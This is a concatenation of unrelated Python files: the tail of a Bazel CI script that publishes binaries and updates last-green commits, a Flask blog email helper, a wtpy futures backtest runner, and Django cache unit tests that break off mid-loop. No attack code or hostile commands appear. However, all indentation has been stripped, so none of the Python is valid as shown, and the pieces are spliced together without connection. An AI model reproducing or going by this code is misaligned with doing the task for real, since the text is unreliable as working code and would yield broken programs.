build_info = client.get_build_info(build_number)
# Find any failing steps other than Buildifier and steps with soft_fail enabled then "try update last green".
def has_failed(job):
state = job.get("state")
# Ignore steps that don't have a state (like "wait").
return (
state is not None
and state != "passed"
and not job.get("soft_failed")
and job["id"] != current_job_id
and job["name"] != BUILDIFIER_STEP_NAME
)
failing_jobs = [j["name"] for j in build_info["jobs"] if has_failed(j)]
if failing_jobs:
raise BuildkiteException(
"Cannot update last green commit due to {} failing step(s): {}".format(
len(failing_jobs), ", ".join(failing_jobs)
)
)
git_repository = os.getenv("BUILDKITE_REPO")
last_green_commit_url = bazelci_last_green_commit_url(git_repository, pipeline_slug)
update_last_green_commit_if_newer(last_green_commit_url)
def update_last_green_commit_if_newer(last_green_commit_url):
last_green_commit = get_last_green_commit(last_green_commit_url)
current_commit = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode("utf-8").strip()
if last_green_commit:
success = False
try:
execute_command(["git", "fetch", "-v", "origin", last_green_commit])
success = True
except subprocess.CalledProcessError:
# If there was an error fetching the commit it typically means
# that the commit does not exist anymore - due to a force push. In
# order to recover from that assume that the current commit is the
# newest commit.
result = [current_commit]
finally:
if success:
result = (
subprocess.check_output(
["git", "rev-list", "%s..%s" % (last_green_commit, current_commit)]
)
.decode("utf-8")
.strip()
)
else:
result = None
# If current_commit is newer that last_green_commit, `git rev-list A..B` will output a bunch of
# commits, otherwise the output should be empty.
if not last_green_commit or result:
execute_command(
[
"echo %s | %s -h 'Cache-Control: no-store' cp - %s"
% (current_commit, gsutil_command(), last_green_commit_url)
],
shell=True,
)
else:
eprint(
"Updating abandoned: last green commit (%s) is not older than current commit (%s)."
% (last_green_commit, current_commit)
)
def try_update_last_green_downstream_commit():
last_green_commit_url = bazelci_last_green_downstream_commit_url()
update_last_green_commit_if_newer(last_green_commit_url)
def latest_generation_and_build_number():
generation = None
output = None
for attempt in range(5):
output = subprocess.check_output(
[gsutil_command(), "stat", bazelci_latest_build_metadata_url()], env=os.environ
)
match = re.search("Generation:[ ]*([0-9]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse generation. gsutil output format changed?")
generation = match.group(1)
match = re.search(r"Hash \(md5\):[ ]*([^\s]+)", output.decode("utf-8"))
if not match:
raise BuildkiteException("Couldn't parse md5 hash. gsutil output format changed?")
expected_md5hash = base64.b64decode(match.group(1))
output = subprocess.check_output(
[gsutil_command(), "cat", bazelci_latest_build_metadata_url()], env=os.environ
)
hasher = hashlib.md5()
hasher.update(output)
actual_md5hash = hasher.digest()
if expected_md5hash == actual_md5hash:
break
info = json.loads(output.decode("utf-8"))
return generation, info["build_number"]
def sha256_hexdigest(filename):
sha256 = hashlib.sha256()
with open(filename, "rb") as f:
for block in iter(lambda: f.read(65536), b""):
sha256.update(block)
return sha256.hexdigest()
def upload_bazel_binaries():
"""
Uploads all Bazel binaries to a deterministic URL based on the current Git commit.
Returns maps of platform names to sha256 hashes of the corresponding bazel and bazel_nojdk binaries.
"""
bazel_hashes = {}
bazel_nojdk_hashes = {}
for platform_name, platform in PLATFORMS.items():
if not should_publish_binaries_for_platform(platform_name):
continue
tmpdir = tempfile.mkdtemp()
try:
bazel_binary_path = download_bazel_binary(tmpdir, platform_name)
# One platform that we build on can generate binaries for multiple platforms, e.g.
# the centos7 platform generates binaries for the "centos7" platform, but also
# for the generic "linux" platform.
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_binary_path,
bazelci_builds_gs_url(target_platform_name, os.environ["BUILDKITE_COMMIT"]),
]
)
bazel_hashes[target_platform_name] = sha256_hexdigest(bazel_binary_path)
# Also publish bazel_nojdk binaries.
bazel_nojdk_binary_path = download_bazel_nojdk_binary(tmpdir, platform_name)
for target_platform_name in platform["publish_binary"]:
execute_command(
[
gsutil_command(),
"cp",
bazel_nojdk_binary_path,
bazelci_builds_nojdk_gs_url(
target_platform_name, os.environ["BUILDKITE_COMMIT"]
),
]
)
bazel_nojdk_hashes[target_platform_name] = sha256_hexdigest(bazel_nojdk_binary_path)
except subprocess.CalledProcessError as e:
# If we're not on the main branch, we're probably building a custom one-off binary and
# ignore failures for individual platforms (it's possible that we didn't build binaries
# for all platforms).
if not current_branch_is_main_branch():
eprint(
"Ignoring failure to download and publish Bazel binary for platform {}: {}".format(
platform_name, e
)
)
else:
raise e
finally:
shutil.rmtree(tmpdir)
return bazel_hashes, bazel_nojdk_hashes
def try_publish_binaries(bazel_hashes, bazel_nojdk_hashes, build_number, expected_generation):
"""
Uploads the info.json file that contains information about the latest Bazel commit that was
successfully built on CI.
"""
now = datetime.datetime.now()
git_commit = os.environ["BUILDKITE_COMMIT"]
info = {
"build_number": build_number,
"build_time": now.strftime("%d-%m-%Y %H:%M"),
"git_commit": git_commit,
"platforms": {},
}
for platform, sha256 in bazel_hashes.items():
info["platforms"][platform] = {
"url": bazelci_builds_download_url(platform, git_commit),
"sha256": sha256,
"nojdk_url": bazelci_builds_nojdk_download_url(platform, git_commit),
"nojdk_sha256": bazel_nojdk_hashes[platform],
}
tmpdir = tempfile.mkdtemp()
try:
info_file = os.path.join(tmpdir, "info.json")
with open(info_file, mode="w", encoding="utf-8") as fp:
json.dump(info, fp, indent=2, sort_keys=True)
try:
execute_command(
[
gsutil_command(),
"-h",
"x-goog-if-generation-match:" + expected_generation,
"-h",
"Content-Type:application/json",
"cp",
info_file,
bazelci_latest_build_metadata_url(),
]
)
except subprocess.CalledProcessError:
raise BinaryUploadRaceException()
execute_command(
[
gsutil_command(),
"cp",
bazelci_latest_build_metadata_url(),
bazelci_builds_metadata_url(git_commit),
]
)
finally:
shutil.rmtree(tmpdir)
def publish_binaries():
"""
Publish Bazel binaries to GCS.
"""
current_build_number = os.environ.get("BUILDKITE_BUILD_NUMBER", None)
if not current_build_number:
raise BuildkiteException("Not running inside Buildkite")
current_build_number = int(current_build_number)
# Upload the Bazel binaries for this commit.
bazel_hashes, bazel_nojdk_hashes = upload_bazel_binaries()
# Try to update the info.json with data about our build. This will fail (expectedly) if we're
# not the latest build. Only do this if we're building binaries from the main branch to avoid
# accidentally publishing a custom debug build as the "latest" Bazel binary.
if current_branch_is_main_branch():
for _ in range(5):
latest_generation, latest_build_number = latest_generation_and_build_number()
if current_build_number <= latest_build_number:
eprint(
(
"Current build '{0}' is not newer than latest published '{1}'. "
+ "Skipping publishing of binaries."
).format(current_build_number, latest_build_number)
)
break
try:
try_publish_binaries(
bazel_hashes, bazel_nojdk_hashes, current_build_number, latest_generation
)
except BinaryUploadRaceException:
# Retry.
continue
eprint(
"Successfully updated '{0}' to binaries from build {1}.".format(
bazelci_latest_build_metadata_url(), current_build_number
)
)
break
else:
raise BuildkiteException("Could not publish binaries, ran out of attempts.")
# This is so that multiline python strings are represented as YAML
# block strings.
def str_presenter(dumper, data):
if len(data.splitlines()) > 1: # check for multiline string
return dumper.represent_scalar("tag:yaml.org,2002:str", data, style="|")
return dumper.represent_scalar("tag:yaml.org,2002:str", data)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
yaml.add_representer(str, str_presenter)
parser = argparse.ArgumentParser(description="Bazel Continuous Integration Script")
parser.add_argument("--script", type=str)
subparsers = parser.add_subparsers(dest="subparsers_name")
bazel_publish_binaries_pipeline = subparsers.add_parser("bazel_publish_binaries_pipeline")
bazel_publish_binaries_pipeline.add_argument("--file_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--http_config", type=str)
bazel_publish_binaries_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline = subparsers.add_parser("bazel_downstream_pipeline")
bazel_downstream_pipeline.add_argument("--file_config", type=str)
bazel_downstream_pipeline.add_argument("--http_config", type=str)
bazel_downstream_pipeline.add_argument("--git_repository", type=str)
bazel_downstream_pipeline.add_argument(
"--test_incompatible_flags", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument(
"--test_disabled_projects", type=bool, nargs="?", const=True
)
bazel_downstream_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
project_pipeline = subparsers.add_parser("project_pipeline")
project_pipeline.add_argument("--project_name", type=str)
project_pipeline.add_argument("--file_config", type=str)
project_pipeline.add_argument("--http_config", type=str)
project_pipeline.add_argument("--git_repository", type=str)
project_pipeline.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--use_but", type=bool, nargs="?", const=True)
project_pipeline.add_argument("--incompatible_flag", type=str, action="append")
project_pipeline.add_argument("--notify", type=bool, nargs="?", const=True)
runner = subparsers.add_parser("runner")
runner.add_argument("--task", action="store", type=str, default="")
runner.add_argument("--file_config", type=str)
runner.add_argument("--http_config", type=str)
runner.add_argument("--git_repository", type=str)
runner.add_argument(
"--git_commit", type=str, help="Reset the git repository to this commit after cloning it"
)
runner.add_argument(
"--repo_location",
type=str,
help="Use an existing repository instead of cloning from github",
)
runner.add_argument(
"--use_bazel_at_commit", type=str, help="Use Bazel binary built at a specific commit"
)
runner.add_argument("--use_but", type=bool, nargs="?", const=True)
runner.add_argument("--save_but", type=bool, nargs="?", const=True)
runner.add_argument("--needs_clean", type=bool, nargs="?", const=True)
runner.add_argument("--build_only", type=bool, nargs="?", const=True)
runner.add_argument("--test_only", type=bool, nargs="?", const=True)
runner.add_argument("--monitor_flaky_tests", type=bool, nargs="?", const=True)
runner.add_argument("--incompatible_flag", type=str, action="append")
subparsers.add_parser("publish_binaries")
subparsers.add_parser("try_update_last_green_commit")
subparsers.add_parser("try_update_last_green_downstream_commit")
args = parser.parse_args(argv)
if args.script:
global SCRIPT_URL
SCRIPT_URL = args.script
try:
if args.subparsers_name == "bazel_publish_binaries_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_publish_binaries_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
)
elif args.subparsers_name == "bazel_downstream_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_bazel_downstream_pipeline(
task_configs=configs.get("tasks", None),
http_config=args.http_config,
file_config=args.file_config,
test_incompatible_flags=args.test_incompatible_flags,
test_disabled_projects=args.test_disabled_projects,
notify=args.notify,
)
elif args.subparsers_name == "project_pipeline":
configs = fetch_configs(args.http_config, args.file_config)
print_project_pipeline(
configs=configs,
project_name=args.project_name,
http_config=args.http_config,
file_config=args.file_config,
git_repository=args.git_repository,
monitor_flaky_tests=args.monitor_flaky_tests,
use_but=args.use_but,
incompatible_flags=args.incompatible_flag,
notify=args.notify,
)
elif args.subparsers_name == "runner":
configs = fetch_configs(args.http_config, args.file_config)
tasks = configs.get("tasks", {})
task_config = tasks.get(args.task)
if not task_config:
raise BuildkiteException(
"No such task '{}' in configuration. Available: {}".format(
args.task, ", ".join(tasks)
)
)
platform = get_platform_for_task(args.task, task_config)
# The value of `BUILDKITE_MESSAGE` defaults to the commit message, which can be too large
# on Windows, therefore we truncate the value to 1000 characters.
# See https://github.com/bazelbuild/continuous-integration/issues/1218
if "BUILDKITE_MESSAGE" in os.environ:
os.environ["BUILDKITE_MESSAGE"] = os.environ["BUILDKITE_MESSAGE"][:1000]
execute_commands(
task_config=task_config,
platform=platform,
git_repository=args.git_repository,
git_commit=args.git_commit,
repo_location=args.repo_location,
use_bazel_at_commit=args.use_bazel_at_commit,
use_but=args.use_but,
save_but=args.save_but,
needs_clean=args.needs_clean,
build_only=args.build_only,
test_only=args.test_only,
monitor_flaky_tests=args.monitor_flaky_tests,
incompatible_flags=args.incompatible_flag,
bazel_version=task_config.get("bazel") or configs.get("bazel"),
)
elif args.subparsers_name == "publish_binaries":
publish_binaries()
elif args.subparsers_name == "try_update_last_green_commit":
# Update the last green commit of a project pipeline
try_update_last_green_commit()
elif args.subparsers_name == "try_update_last_green_downstream_commit":
# Update the last green commit of the downstream pipeline
try_update_last_green_downstream_commit()
else:
parser.print_help()
return 2
except BuildkiteException as e:
eprint(str(e))
return 1
return 0
if __name__ == "__main__":
sys.exit(main())
|
emails.py
|
from threading import Thread
from flask import url_for, current_app
from flask_mail import Message
from bluelog.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(subject, to, html):
app = current_app._get_current_object()
message = Message(subject, recipients=[to], html=html)
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_new_comment_email(post):
post_url = url_for('blog.show_post', post_id=post.id, _external=True) + '#comments'
send_mail(subject='New comment', to=current_app.config['BLUELOG_EMAIL'],
html='<p>New comment is post <i>%s</i>, click the link below to check:</p>'
'<p><a href="%s">%s</a></p>'
'<p><small style="color: #868e96">Do not reply this email.</small></p>'
% (post.title, post_url, post_url))
def send_new_reply_email(comment):
post_url = url_for('blog.show_post', post_id=comment.post_id, _external=True) + '#comments'
send_mail(subject='New reply', to=comment.email,
html='<p>New reply for the comment you left in post <i>%s</i>, click the link below to check: </p>'
'<p><a href="%s">%s</a></p>'
'<p><small style="color: #868e96">Do not reply this email.</small></p>'
% (comment.post.title, post_url, post_url))
|
runBT_multiple.py
|
import sys
import os
dirpath_base = "C:\\Users\\zhouyou\\Documents\\BaiduNetdiskWorkspace\\GitHub\\"
print(dirpath_base)
sys.path.append(os.path.join(dirpath_base, 'wtpy'))
from wtpy import WtBtEngine, EngineType
#from strategies.HftStraDemo import HftStraDemo, myTestHftStrat, myTestHftArbitrageStrat, mySimpleArbitrageStrategy
from strategies.Hft_simpleExecution import mySimpleArbitrageStrategy
from wtpy.apps import WtBtAnalyst
import pandas as pd
from datetime import datetime
import multiprocessing
import time
import threading
s_dir_thisfile = os.path.dirname(os.path.realpath(__file__))
class WtMultipleBacktest:
'''
方便在一次运行里面做多次回测,因为底层是单例模式,所以需要这个\n
'''
def __init__(self, worker_num:int = 8):
'''
构造函数\n
@worker_num 工作进程个数,默认为8,可以根据CPU核心数设置
'''
self.worker_num = worker_num
self.running_worker = 0
self.mutable_params = dict()
self.fixed_params = dict()
self.env_params = dict()
self.cpp_stra_module = None
return
def __gen_tasks__(self, counter:int,):
'''
生成回测任务
'''
int_start = 201812240859
#再生成最终每一组的参数dict
param_groups = list()
int_end = 0
for i_count in range(counter+1):
print("redo")
print(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(i_count)+".csv")
print(int_start, int_end)
print("done")
thisGrp = dict()
thisGrp['i_count'] = i_count
df_tradelist = pd.read_csv(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(i_count)+".csv", index_col=0)
thisGrp['int_start'] = int_start = int(format(datetime.strptime(df_tradelist.index[0],"%Y-%m-%d %H:%M:%S"),'%Y%m%d%H%M'))
s_date = df_tradelist.loc[df_tradelist.index[-1],'tradingDate']
thisGrp['int_end'] = int_end = int(format(datetime.strptime(s_date + ' 15:00',"%Y-%m-%d %H:%M"),'%Y%m%d%H%M'))
print(thisGrp)
thisGrp['contract_1'] = df_tradelist.loc[df_tradelist.index[0],'contract_1']
thisGrp['contract_2'] = df_tradelist.loc[df_tradelist.index[0],'contract_2']
param_groups.append(thisGrp)
return param_groups
def __start_task__(self, params:dict):
'''
启动单个回测任务\n
这里用线程启动子进程的目的是为了可以控制总的工作进程个数\n
可以在线程中join等待子进程结束,再更新running_worker变量\n
如果在__execute_task__中修改running_worker,因为在不同进程中,数据并不同步\n
@params kv形式的参数
'''
p = multiprocessing.Process(target=self.__execute_task__, args=(params,))
p.start()
p.join()
self.running_worker -= 1
print("工作进程%d个" % (self.running_worker))
def __execute_task__(self, params:dict):
'''
执行单个回测任务\n
@params kv形式的参数
'''
i_count = params['i_count']
int_start = params['int_start']
int_end = params['int_end']
contract_1 = params['contract_1']
contract_2 = params['contract_2']
# 创建一个运行环境,并加入策略
engine = WtBtEngine(EngineType.ET_HFT)
engine.init(s_dir_thisfile + '\\common\\', s_dir_thisfile + "\\configbt_2.json")
engine.configBacktest(int_start, int_end)
engine.configBTStorage(mode="csv", path="C:/Users/zhouyou/Documents/BaiduNetdiskWorkspace/futuredata/SP/tick/")
engine.commitBTConfig()
s_name = 'hft_sp_2contracts_multiple_' + str(i_count)
straInfo = mySimpleArbitrageStrategy(name=s_name,
code1="SHFE.sp."+contract_1[2:],
code2="SHFE.sp."+contract_2[2:],
expsecs=20,
offset=0,
file_tradelist = s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(i_count)+".csv",
tradingHorizonMin= 10,
slotsTotal= 2,
slotsEachTime= 1,
coldSeconds= 20,
addtick_open= 2,
addtick_close= 10,
freq=10,
sizeofbet=10)
engine.set_hft_strategy(straInfo)
engine.run_backtest()
engine.release_backtest()
def go(self, counter:int, interval:float = 0.2):
'''
启动优化器\n
@interval 时间间隔,单位秒
@markerfile 标记文件名,回测完成以后分析会用到
'''
self.tasks = self.__gen_tasks__(counter)
self.running_worker = 0
total_task = len(self.tasks)
left_task = total_task
while True:
if left_task == 0:
break
if self.running_worker < self.worker_num:
params = self.tasks[total_task-left_task]
left_task -= 1
print("剩余任务%d个" % (left_task))
p = threading.Thread(target=self.__start_task__, args=(params,))
p.start()
self.running_worker += 1
print("工作进程%d个" % (self.running_worker))
else:
time.sleep(interval)
#最后,全部任务都已经启动完了,再等待所有工作进程结束
while True:
if self.running_worker == 0:
break
else:
time.sleep(interval)
if __name__ == "__main__":
df_tradelist_full = pd.read_csv(s_dir_thisfile + "\\test.csv", index_col=0)
i_begin = 0
counter = 0
if not os.path.isdir(s_dir_thisfile + "\\tradelists_backtest\\"):
os.mkdir(s_dir_thisfile + "\\tradelists_backtest\\")
for i_row in range(1,df_tradelist_full.shape[0]):
s_index = df_tradelist_full.index[i_row]
s_lastindex = df_tradelist_full.index[i_row-1]
if df_tradelist_full.loc[s_index, 'contract_1'] != df_tradelist_full.loc[s_lastindex, 'contract_1'] or \
df_tradelist_full.loc[s_index, 'contract_2'] != df_tradelist_full.loc[s_lastindex, 'contract_2']:
print(i_row)
df_tradelist_full.iloc[i_begin:i_row,:].to_csv(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(counter)+".csv")
counter += 1
i_begin = i_row
df_tradelist_full.iloc[i_begin:,:].to_csv(s_dir_thisfile + "\\tradelists_backtest\\tradelist_backtest_" + str(counter)+".csv")
multipleBT = WtMultipleBacktest(worker_num=8)
multipleBT.go(counter = counter, interval=0.2)
analyst = WtBtAnalyst()
for i_count in range(counter+1):
s_name = 'hft_sp_2contracts_multiple_' + str(i_count)
analyst.add_strategy(s_name, folder="./outputs_bt/" +s_name +"/", init_capital=500000, rf=0.02, annual_trading_days=240)
analyst.run_multiple(outname='bt_backtest')
kw = input('press any key to exit\n')
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
from __future__ import unicode_literals
import os
import re
import copy
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from django.conf import settings
from django.core import management
from django.core.cache import (cache, caches, CacheKeyWarning,
InvalidCacheBackendError, DEFAULT_CACHE_ALIAS)
from django.core.context_processors import csrf
from django.db import connection, connections, router, transaction
from django.core.cache.utils import make_template_fragment_key
from django.http import HttpResponse, StreamingHttpResponse
from django.middleware.cache import (FetchFromCacheMiddleware,
UpdateCacheMiddleware, CacheMiddleware)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import Template
from django.template.response import TemplateResponse
from django.test import TestCase, TransactionTestCase, RequestFactory, override_settings
from django.test.utils import IgnoreDeprecationWarningsMixin
from django.utils import six
from django.utils import timezone
from django.utils import translation
from django.utils.cache import (patch_vary_headers, get_cache_key,
learn_cache_key, patch_cache_control, patch_response_headers)
from django.utils.encoding import force_text
from django.views.decorators.cache import cache_page
try: # Use the same idiom as in cache backends
from django.utils.six.moves import cPickle as pickle
except ImportError:
import pickle
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpickable(object):
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(TestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Non-existent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr, 'answer')
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr, 'answer')
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.incr_version, 'answer')
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
self.assertRaises(ValueError, cache.decr_version, 'answer')
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
setting = dict((k, base.copy()) for k in _caches_setting_base.keys())
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests(object):
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertDictEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertDictEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
self.assertRaises(ValueError, cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
self.assertRaises(ValueError, cache.decr, 'does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
